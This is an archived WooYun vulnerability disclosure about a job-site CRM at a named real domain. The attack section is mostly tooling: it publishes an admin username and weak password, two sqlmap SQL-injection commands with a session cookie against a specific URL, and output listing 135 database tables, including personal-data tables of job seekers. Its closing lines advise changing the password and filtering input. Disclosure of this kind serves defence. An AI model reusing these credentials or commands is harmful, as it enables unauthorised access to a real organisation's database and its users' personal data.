乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-05: 厂商已经主动忽略漏洞,细节向公众公开
http://crm.125job.com/login账号:admin密码:123456
点击编辑用户,可以直接进用户个人中心
sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --dbs--cookie SiteAccess=a3bf4f7355086552a8ee259294184085
sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --tables crm --cookie SiteAccess=a3bf4f7355086552a8ee259294184085
Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: crm[135 tables]+---------------------------------------+| crm_activitylist || crm_corporation_reviews || crm_feedback || crm_notepad || crm_resultslist || crm_shopwindow || crm_shopwindowlist || dsafdf || duo_baoming || duo_card_list || duo_helps || duo_invest || duo_job_corporation_ok || duo_jobs_topset || duo_jobs_visited || duo_log_editcorbase || duo_manage_radio || duo_pinlun || duo_qqapi || duo_sitejob_list || duo_sms_log || duo_taobao_pic || duo_weiboapi || huodong_guaguale_hastime || huodong_guaguale_list || huodong_hrtest || huodong_jinli || huodong_sevenyear || huodong_snakeyearp || huodong_turntable || huodong_weijianli || job_accessing || job_adposition || job_adservice || job_advertise || job_advertise_apprise || job_advertisepos || job_age || job_age_job || job_age_person || job_application || job_apprise || job_class || job_com_tel || job_com_viseted || job_comment || job_corporation || job_corporation_appriseaccess || job_corporation_basis || job_corporation_extenscontact || job_corporation_giveuplog || job_corporation_groups || job_corporation_jobs || job_corporation_logins || job_corporation_manager || job_corporation_message || job_corporation_pic || job_corporation_plan || job_corporation_sale || job_corporation_search || job_corporation_services || job_corporation_sms || job_corporation_smspaylog || job_datum || job_en_person || job_gbooks || job_giveuplog || job_hh_case || job_hh_corporation_job || job_hh_person || job_investigate || job_ip || job_jobscontent_example || job_journal || job_links || job_mail || job_mail_host || job_mailorder || job_manager || job_manager_count || job_manager_radio || job_msg || job_news || job_news_special || job_notice || job_oa_corporation || job_oa_gbook || job_person || job_person_ability || job_person_authenticate || job_person_basis || job_person_book || job_person_card || job_person_edu || job_person_education || job_person_expand || job_person_file || job_person_garner || job_person_general || job_person_haswork || job_person_intention || job_person_jifen || job_person_job || job_person_journal || job_person_letter || job_person_logs || job_person_mailorder || job_person_manager_merge || job_person_merge || job_person_pugong || job_person_remark || job_person_search || job_person_spending || job_person_training || job_person_work || job_pseron_otherinfo || job_search || job_sitejob || job_sitejoblog || job_statistics || job_tag || job_tagged || job_talent || job_viewlogperson || job_weather || job_web_var || job_wei || job_windows || job_wish || job_worker || job_zhaoping_live || job_zhuanchang || weixin_config || weixin_keyword || zhuangpan_person |+---------------------------------------+[22:02:33] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 327 times[22:02:33] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\SqlMap\SQLMAP~1\Bin\output\crm.125job.com'[*] shutting down at 22:02:33[root@Hacker~]# Sqlmap ^A
修改弱口令,过滤特殊字符
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)